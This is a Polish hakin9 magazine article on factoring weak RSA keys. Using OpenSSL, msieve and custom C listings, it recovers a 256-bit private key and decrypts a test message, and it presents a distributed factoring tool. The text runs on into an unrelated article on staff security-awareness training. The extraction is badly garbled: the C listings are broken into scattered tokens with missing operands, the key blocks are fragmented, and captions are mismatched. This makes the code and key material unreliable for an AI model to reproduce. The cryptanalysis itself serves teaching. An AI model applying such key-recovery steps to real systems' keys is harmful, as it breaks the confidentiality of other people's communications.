wania wiadomości.

OpenSSL i RSA

OpenSSL  jest  bardzo  pożytecz-
nym  narzędziem  kryptograficznym
o  otwartym  kodzie.  W  sekcji  refe-
rencji  znajdziesz  informacje,  skąd
je  pobrać;  większość  dystrybucji
GNU/Linux posiada je domyślnie. W
tej sekcji użyjemy tego narzędzia do
stworzenia testowego środowiska, w
którym przeprowadzimy atak.

Pierwszym krokiem jest wyge-

nerowanie pary kluczy do szyfro-
wania i deszyfrowania. Wygeneru-
jemy klucze o 256 bitach, zbyt krót-
kie, by zabezpieczyć naszą komuni-
kację, jednak wystarczające na cele
przykładu.

Generujemy parę kluczy, ukry-

wając nasz klucz prywatny.

# Generuj parę kluczy RSA o 256
bitach
openssl genrsa -out rsa_privkey
.pem 256
cat rsa_privkey.pem
-----BEGIN RSA PRIVATE KEY-----
MIGqAgEAAiEA26dbqzGRt31qincXxy
4jjZMMOId/DVT8aTcq8aam
DiMCAwEAAQIh
AmvT1oXa/rxF3mrVLrR/RS7vK1WT
sQ5CWl/+37wztZOpAhEA+4jg
EkfalFH+0S+1
IPKD5wIRAN+NmMH4AF0B8jz
MAXHHXGUCEGRpRZnGmV

kwSlrTgqj+Zu0CEA7v7CQR
yRxt09zCGNqcYo0CEDEW7mvoz
MYYLC5o+zgfV4U=
-----END RSA PRIVATE KEY-----

Zapisujemy klucz publiczny do pliku.
Jest to klucz, który upublicznimy, by
każdy mógł wysłać do nas zaszyfro-
waną wiadomość.

# Zapisujemy klucz publiczny do

pliku

openssl rsa -in rsa_privkey.pem
-pubout -out rsa_pubkey.pem
cat rsa_pubkey.pem
-----BEGIN PUBLIC KEY-----
MdwwDQYJKoZIhvcNAQEBB
QADKwAwKAIhANunW6sxkbd
9aop3F8cuI42TDDiHfw1U
/Gk3KvGmpg4jAgMBAAE=
-----END PUBLIC KEY-----

Po wygenerowaniu pary kluczy, mo-
żemy już kodować i rozkodowywać
wiadomość, która w naszym przy-
padku będzie brzmiała:

echo "Forty-two" > plain.txt

Wiadomość możemy łatwo zaszyfro-
wać przez użycie następującej ko-
mendy i klucza publicznego:

openssl rsautl -encrypt
-pubin -inkey rsa_pubkey.pem \
-in plain.txt -out cipher.txt

W celu zdeszyfrowania wiadomości,
użyjemy klucza prywatnego:

openssl rsautl -decrypt -inkey
rsa_privkey.pem -in cipher.txt

Wiemy  już,  jak  używać  OpenSSL
z  RSA,  by  zdeszyfrować  wiadomo-
ści  przy  pomocy  klucza  prywatne-
go. Naszym celem jest zdobycie te-
go klucza bez konieczności odczyty-
wania oryginału. Innymi słowy, szu-
kamy  sposobu  na  zdobycie  klucza
prywatnego  przy  pomocy  klucza
publicznego.  Pierwszą  rzeczą,  jaką
musimy zrobić, jest zdobycie modu-
lo  n  oraz  wykładnika  szyfrującego.
Możemy  to  osiągnąć  przy  pomocy
następującej  komendy  i  klucza  pu-
blicznego:

Listing 1.

Konwersja liczby

hexadecymalnej do dziesiętnej

#include

<stdio.h>

#include

int

main

(

int

argc

char

argv

)

{

BIGNUM

BN_new

();

(

argc

)

{

printf

(

"%s <hex>

argv

[

]);

return

;

}

BN_hex2bn

argv

[

]))

{

printf

(

"error:

BN_hex2bn()"

);

return

;

}

printf

(

"%s

BN_bn2dec

(

));

BN_free

(

);

}

Atak faktoryzacyjny na RSA

hakin9 Nr 4/2007

www.hakin9.org

openssl rsa -in rsa_pubkey.pem
-pubin -text -modulus
Modulus (256 bit):
00:db:a7:5b:ab:31:91:b7:7d:

6a:8a:77:17:c7:2e:
23:8d:93:0c:38:87:7f:0d:54:
fc:69:37:2a:f1:a6:
a6:0e:23

Exponent: 65537 (0x10001)
Modulus=DBA75BAB3191B77D
6A8A7717C72E238D930C38877
F0D54FC69372AF1A6A60E23
writing RSA key
-----BEGIN PUBLIC KEY-----
MdwwDQYJKoZIhvcNAQEBBQ
ADKwAwKAIhANunW6sxkbd9
aop3F8cuI42TDDiHfw1U
/Gk3KvGmpg4jAgMBAAE=
-----END PUBLIC KEY-----

Modulo  jest  reprezentowane  w  sys-
temie  hexadecymalnym.  Aby  skon-
wertować  je  do  liczby  dziesiętnej,
pokażemy na Listingu 1:

gcc hex2dec.c -lssl
./a.out DBA75BAB3191B77D6
A8A7717C72E238D930C388
77F0D54FC69372AF1A6A60E23
99352209973842013949736850170
185769998267119089063339396
575567287426977500707

Po otrzymaniu modulo dziesiętnego,
sfaktoryzujemy je.

Faktoryzacja modulo n

Ponieważ  liczba,  którą  faktoryzuje-
my, nie jest zbyt duża, wystarczy, że
użyjemy  algorytmu  faktoryzującego
QS.  Ten  algorytm  jest  implemento-
wany  przez  msieve,  aplikację,  którą
możemy  pobrać  z  linka  umieszczo-
nego w tabeli referencji. Msieve po-
siada dobrą dokumentację i instruk-
cję instalacji, która nie jest skompli-
kowana. Faktoryzacji liczby dokona-
my przez następującą komendę:

/msieve -v
9935220997384201394973685
01701857699982671190890633
39396575567287426977500707

Nowoczesny komputer może sfakto-
ryzować tą liczbę w ciągu około dzie-
sięciu minut. Rezultatem jest:

factor: 297153055211137492311
771648517932014693
factor: 334346924022870445836
047493827484877799

Na tym etapie, po sfaktoryzowaniu
modulo n i posiadając wykładnik szy-

Listing 2.

Klucz prywatny

#include

<stdio.h>

#include

#include

#include

#include

int

main

(

int

argc

char

argv

)

{

RSA

keypair

RSA_new

();

BN_CTX

ctx

BN_CTX_new

();

BN_CTX_start

(

ctx

);

BIGNUM

BN_new

();

BIGNUM

BN_new

();

BIGNUM

BN_new

();

BIGNUM

BN_new

();

BIGNUM

BN_new

();

BIGNUM

dmp1

BN_new

();

BIGNUM

dmq1

BN_new

();

BIGNUM

iqmp

BN_new

();

BIGNUM

BN_CTX_get

(

ctx

);

BIGNUM

BN_CTX_get

(

ctx

);

BIGNUM

BN_CTX_get

(

ctx

);

BIGNUM

BN_CTX_get

(

ctx

);

(

argc

)

{

printf

(

"%s [p] [q] [exp]

argv

[

]);

return

;

}

BN_dec2bn

argv

[

]);

BN_dec2bn

argv

[

]);

BN_dec2bn

argv

[

]);

(

BN_cmp

(

)

{

BIGNUM

tmp

;

tmp

;

}

BN_mul

(

ctx

);

BN_sub

(

BN_value_one

());

// p-1

BN_sub

(

BN_value_one

());

// q-1/

BN_mul

(

ctx

);

// (p-1)(q-1)

BN_mod_inverse

(

ctx

);

// d

BN_mod

(

dmp1

ctx

);

BN_mod

(

dmq1

ctx

);

BN_mod_inverse

(

iqmp

ctx

);

keypair

;

keypair

;

keypair

;

keypair

;

keypair

;

keypair

dmq1

;

keypair

dmp1

;

keypair

iqmp

;

PEM_write_RSAPrivateKey

(

stdout

keypair

NULL

);

BN_CTX_end

(

ctx

);

BN_CTX_free

(

ctx

);

RSA_free

(

keypair

);

return

;

}

hakin9 Nr 4/2007

www.hakin9.org

Atak

frowania 65537 z poprzedniego kroku,
posiadamy wszystkie niezbędne dane
do otrzymania klucza prywatnego.

Otrzymywanie

klucza prywatnego

i deszyfrowanie

wiadomości

Ponieważ dostępne narzędzia, ja-
kie mogłyby nam być tu pomocne, są

trudne w obsłudze i niedostosowane
do naszych potrzeb, stworzymy wła-
sną aplikację, która wykona za nas
niezbędne procedury. Kod źródłowy
prezentujemy na Listingu nr 3.

Do wykonania obliczeń wykorzy-

staliśmy bibliotekę OpenSSL. Zmienne
typu BIGNUM są używane przez nią
do operacji na wielkich liczbach. Ma-
ją one swoje własne API do wykony-

wania takich operacji jak: dodawanie,
odejmowanie, operacje modularne itp.

Przykładowy program przypisu-

je do zmiennych typu BIGNUM para-
metry p, q i e. Analizując dalsze proce-
dury programu i komentarze dowiesz
się,  jak  zostaje  wygenerowany  klucz
prywatny.  Ta  sama  procedura  zosta-
ła wcześniej wyjaśniona z punktu wi-
dzenia teorii. W istocie, jedyna różnica
między tym testem, a prawdziwą gene-
racją polega na tym, że p i q nie są lo-
sowo wybrane. W naszym przypadku,
otrzymaliśmy je z faktoryzacji modulo.
W  końcu,  przy  pomocy

PEM _ write _

RSAPrivateKey()

, zapisujemy klucz pry-

watny użyty w przykładzie do formatu
PEM. Jeśli prównamy wygenerowany
klucz z oryginalnym kluczem prywat-
nym, zobaczymy, że otrzymaliśmy to,
czego chcieliśmy – klucz prywatny z
klucza publicznego.

Jeśli zapiszemy nasz nowy klucz

prywatny w pliku tekstowym, np.

rsa _ hacked _ privkey.pem

, zdeszy-

frujemy wiadomość przy pomocy:

openssl rsautl -decrypt
-inkey rsa_hacked_privkey
.pem -in cipher.txt

Nowoczesne algorytmy

faktoryzujące

Algorytmy

faktoryzujące

uległy

znacznym  ulepszeniom,  obecnie  po-
siadamy  wiele  szybko  działających
algorytmów,  jak  Elliptic  Curve  Me-

thod  (ECM),  Quadratic  Sieve  (QS),
czy Number Field Sieve (NFS). Każ-
dy z tych algorytmów wykorzystuje in-
ne procedury do pełnej lub częściowej
faktoryzacji, w zależności od typu licz-
by  faktoryzowanej.  Algorytmy  te  nie
są  skomplikowane.  Są  standardowo
podzielone  na  kolejne  kroki  wiodące
do pełnej faktoryzacji. QS i NFS uży-
wają sita.  Zbierane są pewne relacje,
które finalnie służą do skonstruowania
układu równań, który, po rozwiązaniu,
daje oczekiwany rezultat. Krok zawie-
rający sito może być wykonywany na
kilku maszynach jednocześnie, ponie-
waż trwa on najdłużej.

W naszym przykładzie użyliśmy

aplikacji msieve, implementacji Sita
Wielokrotnych Układów Równań Wie-
lomianów (Multiple Polynomial Qu-

Listing 4.

dfact_client

...

for

(;;)

{

get_random_seeds

seed1

seed2

);

switch

(

status

)

{

case

DF_CLIENT_STATUS_WAITING

recv_N_number

rel_by_host

host

);

)

sleep

(

DF_TIME_TO_RECV

);

else

status

DF_CLIENT_STATUS_RUNNING

;

break

;

case

DF_CLIENT_STATUS_RUNNING

{

msieve_obj

obj

NULL

;

obj

msieve_obj_new

(

flags

relations

NULL

seed1

seed2

rel_by_host

);

(

obj

NULL

)

{

syslog

(

LOG_ERR

"Factoring initialization failed"

);

free

(

);

return

;

}

msieve_run

(

obj

);

(

obj

)

msieve_obj_free

(

obj

);

while

send_relations

(

host

relations

))

sleep

(

DF_TIME_TO_SEND

);

(

unlink

(

relations

)==-

)

syslog

(

LOG_ERR

"unlink(): %s: %s"

relations

strerror

(

errno

));

status

DF_CLIENT_STATUS_WAITING

;

free

(

);

}

break

;

default

break

;

}

...

Listing 3.

Zamiana klucza prywatnego w publiczny

gcc

get_priv_key

lssl

get_priv_key

297153055211137492311771648517932014693

334346924022870445836047493827484877799

65537

-----

BEGIN

RSA

PRIVATE

KEY

-----

MIGqAgEAAiEA26dbqzGRt31qincXxy4jjZMMOId

DVT8aTcq8aamDiMCAwEAAQIh

AMvT1oXa

rxF3mrVLrR

RS7vK1WTsQ5CWl

wztZOpAhEA

jgEkfalFH

IPKD5wIRAN

NmMH4AF0B8jzMAXHHXGUCEGRpRZnGmVkwSlrTgqj

Zu0CEA7v7CQR

yRxt09zCGNqcYo0CEDEW7mvozMYYLC5o

zgfV4U

-----

END

RSA

PRIVATE

KEY

-----

Atak faktoryzacyjny na RSA

hakin9 Nr 4/2007

www.hakin9.org

adratic Sieve (MPQS)), wariacji QS.
Algorytm QS jest szybszy w przypad-
ku faktoryzacji liczb o ilości cyfr mniej-
szej niż 110, jednak gdy przekraczamy
tą granicę, powinniśmy użyć NFS. Wa-
riacją NFS, używaną do faktoryzacji
dowolnego typu liczb, jest GNFS (Ge-

neral Number Field Sieve, ogólne sito
pól liczb). Nie ma wiele aplikacji dar-
mowych, implementujących GNFS,

zaś istniejące nie posiadają dobrej do-
kumentacji, lub są trudne w użyciu. Tak
przynajmniej wygląda sytuacja w chwili
pisania artykułu. Pokażemy zatem, jak
działa GGNFS, implementacja GNFS,
która mimo, że nie jest w pełni stabilna,
pozwala na faktoryzację bez zbyt wie-
lu problemów.

GGNFS składa się z zestawu na-

rzędzi, które, użyte po kolei, składają

się na pełną implementację algoryt-
mu. Dla osoby początkującej, wyko-
nanie każdego kroku z osobna mo-
że  być  trudne.  Dlatego  też  GGNFS
posiada  dołączony  skrypt  perl,  któ-
ry wykonuje za nas większość pracy.
Skrypt pozwala na łatwe użycie pro-
gramu,  jednak  nie  jest  najlepszym
rozwiązaniem do wykorzystania peł-
ni możliwości, drzemiących w narzę-
dziach składających się na GGNFS.

Najprostszy sposób użycia tego

programu polega na stworzeniu pliku,
który nazwiemy test.n, zawierającego
liczbę, którą chcemy sfaktoryzować.

cat test.n
n: 1522605027922533360535
6183781326374297180681149
6138068865790849458012296
3258952897654000350692006139

Następnie uruchamiamy:

tests/factLat.pl test.n

Ta komenda sfaktoryzuje liczbę. Czas
jest zależny od posiadanego sprzętu,
jednak  by  użyć  całej  mocy  GGNFS,
musimy  zapomnieć  o  przydatnym
skrypcie factLat.pl i wgłębić się w każ-
de z narzędzi pakietu, używając ich w
określonej kolejności. Ponieważ uży-
cie GGNFS wykracza poza ramy tego
artykułu,  nie  opiszę  go  tutaj.  Najlep-
szym  wyjściem  jest  przestudiowanie
dokumentacji dołączonej do kodu źró-
dłowego oraz śledzenie forum projek-
tu. Można także w Internecie znaleźć
kilka publikacji na temat NFS, jednak
bez zaawansowanej wiedzy na temat
algebry liniowej i teorii liczb daleko nie
zajdziemy.

Zapotrzebowanie na

rozproszony atak

Klucz, sfaktoryzowany w tym przykła-
dzie, jest bardzo niewielki w porówna-
niu  z  długością  kluczy  obecnie  uży-
wanych. Jeśli chcemy stworzyć klucz
RSA  do  użytku  własnego,  powinni-
śmy  użyć  minimalnie  1024  bity.  Je-
śli  potrzebujemy  zwiększonego  bez-
pieczeństwa,  powinniśmy  wygenero-
wać klucz o 2048 lub 4096 bitach. Je-
śli spróbujemy złamać taki klucz przy
pomocy  domowego  komputera,  nie-

Listing 6.

dfact_server (process_relations)

void

process_relations

(

char

int

num_relations

int

seconds

)

{

for

(;;)

{

int

n_sieves

get_num_relations_in_file

(

DF_FILE_RELATIONS

);

printf

(

"relations: %d, need: %d

n_sieves

num_relations

);

// Has enough relations?

(

n_sieves

num_relations

)

{

printf

(

"Factoring %s

);

kill

(

SIGUSR1

);

uint32

seed1

;

uint32

seed2

;

uint32

flags

;

flags

MSIEVE_FLAG_USE_LOGFILE

;

get_random_seeds

seed1

seed2

);

factor_integer

(

flags

DF_FILE_RELATIONS

NULL

seed1

seed2

);

printf

(

"Factoring Done

);

kill

(

getppid

()

SIGKILL

);

exit

(

);

}

sleep

(

seconds

);

}

Listing 5.

dfact_server

...

for

(;;)

{

while

(

child_count

DF_MAX_CLIENTS

)

sleep

(

);

sd_tmp

socket_server_accept

(

client

sizeof

(

client

));

((

pid

fork

())==

)

{

(

);

process_client

(

sd_tmp

num_relations

rel_by_host

client

);

}

else

(

pid

)

{

(

sd_tmp

);

child_count

++;

}

else

{

perror

(

"fork()"

);

}

(

sd_tmp

);

}

(

);

...

hakin9 Nr 4/2007

www.hakin9.org

Atak

zależnie od czasu mu danego, zaob-
serwujemy, że cały czas pracuje, zaś
wyniku wciąż nie ma. Prawda jest ta-
ka, że takiego klucza niemal nie moż-
na złamać, jednak osiągnięcia mate-
matyków i rozwój komputerów z każ-
dym  dniem  przybliżają  nas  do  suk-
cesu.  W  szczególnych  przypadkach,
możemy  użyć  rozproszonego  ataku,
używając  tysięcy  maszyn  jednocze-
śnie,  by  przyspieszyć  proces  fakto-
ryzacji.  Istnieje  wiele  publikacji  i  ba-
dań na temat analiz możliwości prze-
prowadzania ataków na klucze o 1024
bitach (zobacz linki w ramce). W tym
momencie,  jest  to  poza  zasięgiem
znakomitej  większości  ludzi,  lecz  nie
poza zasięgiem rządów i organizacji.
Konkursy, jak wcześniej wspominany,
pomagają także ekspertom, dając im
motywację do tworzenia aplikacji po-
magających  w  przeprowadzaniu  roz-
proszonych  ataków  faktoryzacyjnych
na wielkie liczby.

Rozproszony atak

W  poprzednich  przykładach  używa-
liśmy  aplikacji  msieve.  Jak  udowod-
niliśmy, program jest prosty w obsłu-
dze  i  nie  przysparza  zbyt  wielu  pro-
blemów użytkownikowi. Według mnie
jest to obecnie najlepsza implementa-
cja algorytmu Quadratic Sieve (kwa-
dratowe sito). Aplikacja ta stanowi jed-
nakże niemal wersje demonstracyjną
całej biblioteki msieve, może bowiem
być użyta tylko na jednej maszynie.

W dokumentacji aplikacji jest kil-

ka wskazówek, jak użyć tej wersji z
wieloma maszynami, w celu przepro-
wadzenia ataku rozproszonego. Jest
to jednak manual, który nie przedsta-
wia zbyt wielu praktycznych proce-
dur. Napisałem więc małą aplikację,
która wykorzystuje bibliotekę msieve
do wykonania rozproszonego ataku.
Program nazywa się dfact i jest on
zamieszczony na CD dołączonym do
pisma oraz pod adresem widocznym
w ramce z odnośnikami.

Program może zostać skompilo-

wany przy pomocy make, wymaga
jedynie poprawnie zainstalowanej bi-
blioteki msieve. Ścieżka do tej biblio-
teki musi być przedstawiona w Ma-
kefile. Po skompilowaniu, otrzymamy
dwa binaria w folderze bin/, które są

klientem i serwerem. Serwer (dfs) po-
winien być uruchomiony na maszynie
z  wystarczającą  ilością  pamięci  (im
większa  liczba,  tym  więcej  potrzeba
pamięci),  będzie  odpowiedzialny  za
dystrybuowanie  obciążenia  na  inne
maszyny i koordynację klientów. Ser-
wer przyjmuje cztery parametry: licz-
bę, którą faktoryzujemy, liczbę relacji,
które  chcemy,  by  klient  wysyłał  przy
każdej kompilacji, oraz liczbę sekund,
która będzie oddzielać kolejne spraw-
dzenia serwera, czy posiada już wy-
starczające dane od klientów, by za-
kończyć faktoryzację. W przykładzie,
klient będzie wysyłał relacje co 5000,
zaś  serwer  będzie  weryfikował  ilość
relacji co 60 sekund.

bin/dfs 9935220997384201394
973685017018576999826
711908906333939657556
7287426977500707 5000 60

Uruchomimy  dmc  na  kilku  maszy-
nach  klienckich,  podając  jako  para-
metr  adres  IP  serwera  oraz  ścież-
kę  do  pliku  tymczasowego,  w  któ-
rym  będą  zapisywane  relacje.  Na
przykład:

bin/dfc /tmp/rel 192.168.1.7

Aplikacja dfact została stworzona przy
użyciu biblioteki msieve. Posiada ona
program przykładowy, demo.c, któ-
ry pokazuje jej wykorzystanie w pro-
sty sposób. Analizując kod, dojdziemy
do wniosku, że nie jest wcale trudny
do zrozumienia. Na Listingu 4. widzi-
my część kodu klienta dfact. Prezen-
tujemy zasadę działania głównej pę-
tli, w której klient otrzymuje liczbę do
sfaktoryzowania od serwera, następ-
nie oblicza relacje dzięki msieve, oraz
odsyła je do serwera w celu dalszego
przetwarzania.

Zobaczmy, jak serwer obsługu-

je klientów (Listing 5). Każdy klient,
proszący o listę relacji, jest obsługi-
wany przez osobny proces

process _

client()

Kolejna osobna procedura zaj-

muje się przetwarzaniem relacji, któ-
re klient wysłał w określonym inter-
wale czasowym (Listing 6).

Przykładowa aplikacja pozwala na

sfaktoryzowanie liczby przy użyciu kil-
ku maszyn. Mimo, że może być ona
używana przez Internet, brak autenty-
kacji i/lub mechanizmów szyfrujących
powoduje, że nie jest zalecana. Do-
brym usprawnieniem, które poleca-
my czytelnikom jako ćwiczenie, może
być wprowadzenie SSL, podniesienie

Wyzwanie Faktoryzowania RSA (The RSA Factoring

Challenge)

• RSA-704 (30.000$) – http://www.rsasecurity.com/rsalabs/

node.asp?id=2093#RSA704;

• RSA-768 (50.000$) – http://www.rsasecurity.com/rsalabs/

node.asp?id=2093#RSA768;

• RSA-896 (75.000$) – http://www.rsasecurity.com/rsalabs/

node.asp?id=2093#RSA896;

• RSA-1024 (100.000$) – http://www.rsasecurity.com/rsalabs/node.asp?id=2093#

RSA1024;

• RSA-1536 (150.000$) – http://www.rsasecurity.com/rsalabs/node.asp?id=2093#

RSA1536;

W Sieci

•   Faktoryzacja wielkich liczb – http://factorizacion.blogspot.com;
•   DFACT – http://daniellerch.com/sources/projects/dfact/dfact-hakin9.tar.gz;
•   Grupa Yahoo! traktująca o GGNFS – http://www.groups.yahoo.com/group/ggnfs;
•   MSIEVE – Faktoryzator – http://www.boo.net/~jasonp/qs.html;
•   OpenSSL – http://www.openssl.org;
•   Algorytm Shor – http://es.wikipedia.org/wiki/Algoritmo_de_Shor;
•   Koszt faktoryzowania RSA 1024 – http://www.wisdom.weizmann.ac.il/%7Etromer/

papers/cbtwirl.pdf;

Atak faktoryzacyjny na RSA

poziomu zabezpieczeń, podnoszenie
wydajności itp...

Wspomnieliśmy wcześniej, że

GNFS jest bardziej wydajne niż MPQS
przy  faktoryzowaniu  liczb  mających
powyżej  110  cyfr.  Na  obecną  chwilę,
wydaje  się,  że  nie  ma  dobrej  imple-
mentacji o otwartym kodzie, która po-
zwalałaby  na  rozproszone  faktoryzo-
wanie przy pomocy GNFS, jak to zrobi-
liśmy przy pomocy msieve (QS). Autor
msieve zapowiada jednak wprowadze-
nie obsługi GNFS. Jest dopiero w po-

łowie  implementowania  tego  rozwią-
zania,  jednak  w  niedalekiej  przyszło-
ści  możemy  spodziewać  się  dobrego
narzędzia. Jeśli tak się stanie, mody-
fikacja naszego przykładowego narzę-
dzia (dfact) powinna być prosta, a wte-
dy faktoryzacja rozproszona za pomo-
cą GNFS stanie się możliwa. GGNFS
posiada  możliwość  wykorzystania  kil-
ku  maszyn  w  celu  przeprowadzenia
faktoryzacji.  Może  to  być  przeprowa-
dzone  za  pomocą  skryptu  factLat.pl,
przedstawionego  wcześniej,  jednak

O Autorze

Daniel Lerch Hostalot, inżynier aplikacji C/C+ na platformach GNU/Linux, magister
w Zabezpieczeniach Sieci Bezprzewodowych z Cisco Networking Academy Program
(CCNA), Inżynier Techniczny systemów IT uhonorowany przez Uniwersytet Oberta w
Catalonii (UOC) obecnie pracuje w sektorze telekomunikacji. Programuje w językach:
C/C++, ShellScript, Java, Perl, PHP (program modułów C).

kontakt z autorem: dlerch@gmail.com, url: http://daniellerch.com

jest to wersja bardzo niestabilna, w do-
datku działająca jedynie w sieci LAN.

Konkluzja

Liczba, która jest niemożliwa do sfak-
toryzowania  dzisiaj,  może  być  fakto-
ryzowalna  jutro  w  ciągu  kilku  minut.
Wszystko  zależy  od  innowacyjnych
pomysłów i nowych podejść do proble-
mu. 20 lat prac przy algorytmach RSA
obrazuje nam, jak bezpieczny i trudny
do złamania jest ten sposób zabezpie-
czenia.

Warto wspomnieć, że w niedale-

kiej  przyszłości,  tworzone  kompute-
ry kwantowe będą stanowiły zagroże-
nie  dla  tego  kryptosystemu.  Opraco-
wano  algorytm  Shor,  który  pokazuje
rozwiązanie problemu z użyciem zło-
żonych wielomianów. Jego implemen-
tacja  powinna  pozwolić  na  faktoryzo-
wanie  kluczy  w  rozsądnym  zakresie
czasowym. l

www.hakin9.org

hakin9 Nr 4/2007

Obrona

aawansowane  zabezpieczenia  sprzę-
towe,  jak  i  programowe,  wykorzysty-
wane  w  firmowych  sieciach  kompute-

rowych  w  dzisiejszych  czasach,  nie  rozwią-
zują w pełni problemu „wycieku” wrażliwych
danych z naszej firmy. Także wdrożona w or-
ganizacji  polityka  bezpieczeństwa  również
często  niewystarczająco  minimalizuje  to  ry-
zyko. Powodów nieskuteczności polityki bez-
pieczeństwa jest wiele,  często widnieje ona
tylko na papierze i leży na półce, albo nie jest
odpowiednio  wspierana  przez  kadrę  zarzą-
dzającą.  W  głównej  mierze  jednak  ważnym
powodem  tego  jest  nieodpowiednia  polity-
ka  uświadamiania  pracowników  (użytkowni-
ków) firmy.

Przeglądając raporty renomowanych firm

badających  poziom  bezpieczeństwa  w  róż-
nych  przedsiębiorstwach  w  Polsce  i  na  świe-
cie zauważyć można, że największe zagroże-
nie istnieje wewnątrz przedsiębiorstwa, a więc
po stronie personelu. Zagrożenie to można po-
dzielić na dwie grupy: związane z nieumyślnym
(nieświadomym),  oraz  celowym  działaniem
pracowników na szkodę firmy.

Budowa świadomości zagrożeń i potrzeby

ochrony firmowych danych powinna dotyczyć

każdego pracownika, bez względu na stanowi-
sko jakie pełni. Nie wolno zapomnieć tu o ad-
ministratorach sieci i kadrze zarządzającej. Nie
bez powodu istnieje opinia, że aby zdobyć istot-
ne informacje – tajemnice firmy - wystarczy do-
stać się do domowego komputera lub laptopa
Dyrektora.

W większości przypadków szkolenie ka-

dry  zarządzającej  jest  największym  pro-
blemem,  ale  i  największym  wyzwaniem  dla
osoby  odpowiedzialnej  za  bezpieczeństwo

Budowanie świadomości

usprawnia poziom

bezpieczeństwa

Adam Kuczyński

stopień trudności

Zabezpieczenia techniczne i proceduralne są bardzo istotne, ale

dopiero w połączeniu z odpowiednim przeszkoleniem i wysoką

świadomością użytkowników znacznie usprawnia się poziom

bezpieczeństwa informacyjnego w przedsiębiorstwie.

Z artykułu dowiesz się...

• istota budowania świadomości zagrożeń i

ochrony informacji

• techniki budowania świadomości
• sposoby ochrony przed manipulacją

Powinieneś wiedzieć...

• powinieneś znać techniki bezpieczeństwa infor-

macyjnego

• co to jest polityka bezpieczeństwa
• co to jest system zarządzania bezpieczeń-

stwem informacji

Świadomość zagrożeń i potrzeby ochrony informacji.

hakin9 Nr 5/2007

www.hakin9.org

(CSO).  Kadra  zarządzająca  jest
kluczowym elementem bezpiecznej
organizacji.  Od  niej  zależy  bardzo
wiele.  Powinna  aktywnie  uczestni-
czyć w procesie wdrażania polityki
bezpieczeństwa,  określać  jej  cele,
pokazać  zaangażowanie,  nie  za-
pominać  o  bezpieczeństwie  przy
planowaniu  budżetu.  Uczestniczyć
powinna  również  w  programie  bu-
dowania  świadomości,  wspierając
CSO.  Dobra  polityka  uświadamia-
nia  musi  opierać  się  na  wsparciu
kadry zarządzającej, gwarantuje to
bardzo  dużą  skuteczność,  zwłasz-
cza  wtedy,  gdy  CSO  nie  ma  wy-
robionej  jeszcze  odpowiednio  do-
brej  pozycji  w  organizacji.  To  jest
pierwsze  i  kluczowe  zadanie  CSO
przy  planowaniu  i  wdrażaniu  po-
lityki  uświadamiania  personelu;
odpowiednio  nastawić,  uświado-
mić  i  uzyskać  pełne  wsparcie  ka-
dry  zarządzającej.  Nie  jest  to  za-
danie proste, szczególnie jeśli cho-
dzi o tematy związane z wydatkami
na bezpieczeństwo, ale jeśli się to
uda, to już połowa sukcesu.

Budowa świadomości pracow-

ników  powinna  opierać  się  na  po-
dejściu procesowym, składającym
się  z  cyklicznych  szkoleń  i  ćwi-
czeń  dla  użytkowników,  uwzględ-
niając za każdym razem nowe za-
grożenia,  sposoby  ataków  osób
niepowołanych  i  sposoby  obro-
ny.  W  efekcie,  reakcja  użytkowni-
ka na zdarzenia zagrażające bez-
pieczeństwu powinna być automa-
tyczna-  wytrenowana,  analogicz-
nie  do  zawodników  sportowych.
Sportowcy  w  trakcie  treningu  re-
gularnie  powtarzają  wielokrot-
nie  te  same  ćwiczenia,  aby  póź-
niej  wykonywać  je  automatycznie
i  prawidłowo.  Na  podobnej  zasa-
dzie  powinna  opierać  się  polity-
ka  uświadamiania  personelu,  nie-
zbędne są więc regularne szkole-
nia, dzięki którym użytkownik uczy
się.  Poznaje  on  polityki,  procedu-
ry  bezpieczeństwa  oraz  dowiadu-
je  się,  jakie  istnieją  zagrożenia  z
zewnątrz i jak sobie z nimi radzić.
Ważne  jest,  aby  każdy  z  pracow-
ników wiedział, że w każdej chwili
może stać się ofiarą ataku.

Cykl szkoleń powinien rozpo-

czynać  się  już  przy  zatrudnieniu
pracownika.  Należy  przy  tym  jed-
nak pamiętać, że pełne szkolenie z
obowiązujących zasad bezpieczeń-
stwa  w  pierwszych  dniach  pracy
użytkownika  jest  skuteczne  mak-
symalnie  pół  roku.  Po  tym  czasie
bardzo  często  pada  pytanie:  a  co
to jest ta polityka bezpieczeństwa?
Natomiast po upływie roku ten sam
użytkownik nie pamięta, czy w ogó-
le uczestniczył w tego typu szkole-
niu.  Jest  to  zauważalne  szczegól-
nie  w  dużych  przedsiębiorstwach.
Wracając  do  analogii  sportowców,
gdzie mówi się, że treningi są sku-
teczne  jeżeli  są  regularne,  podob-
nie jest i tutaj, a więc szkolenia po-
winny odbywać się cyklicznie, ma-
jąc na uwadze fakt, aby czas mię-
dzy  jednym  szkoleniem  a  drugim
nie był zbyt długi. Jaki to czas? Za-
leżny  od  analizy  ryzyka  dla  dane-
go  stanowiska  pracy,  czy  samego
przedsiębiorstwa. Jednak nie mniej
niż dwa razy w roku.

Program szkolenia powinien

omawiać  wszystkie  obowiązują-
ce  zasady  i  procedury  bezpieczeń-
stwa oraz zagrożenia, na które może
być narażony użytkownik. Wszystko
to poparte przykładami konkretnych
zdarzeń  z  pokazaniem,  w  jaki  spo-
sób powinno się na nie reagować.

Należy zwrócić uwagę na to,

że  użytkownicy  pracując  na  co
dzień  na  pewnych  danych  nierzad-
ko  uważają  je  za  zwykłe,  nikomu
z  zewnątrz  niepotrzebne,  informa-
cje.  A  w  rzeczywistości  mogą  być
to dane bardzo cenne dla konkuren-
cji lub, co gorsza, informacje, które
są prawnie chronione np. dane oso-
bowe.  Wniosek  nasuwa  się  jeden.
Każdy pracownik powinien wiedzieć
dlaczego  oraz  w  jaki  sposób  musi
chronić  informacje,  do  których  ma
dostęp.

Bardzo ważne jest zidentyfi-

kowanie  dla  poszczególnych  grup
pracowników  wszystkich  zagrożeń
i  wszelkich  możliwych  sposobów
ataków w celu pozyskania naszych
informacji  i  przedstawienie  ich  na
szkoleniach.  Omówienie  konkret-
nych przykładów i znalezienie odpo-
wiedniej obrony znacznie dłużej po-
zostanie w świadomości użytkowni-
ków.  Dobrym  przykładem  pokazu-
jącym, jakie mogą być skutki złego
uczenia personelu odpowiednich re-
akcji jest firma, która korzysta z out-
sourcingu  środowiska  IT.  Z  pozo-
ru  wydaje  się,  że  zagrożenia  zwią-
zane z bezpieczeństwem IT są nie-
wielkie. Skoro cała infrastruktura in-
formatyczna została oddana w ręce
wyspecjalizowanej  firmy  zewnętrz-
nej,  która  zapewnia  wysokie  bez-

Rysunek 1.

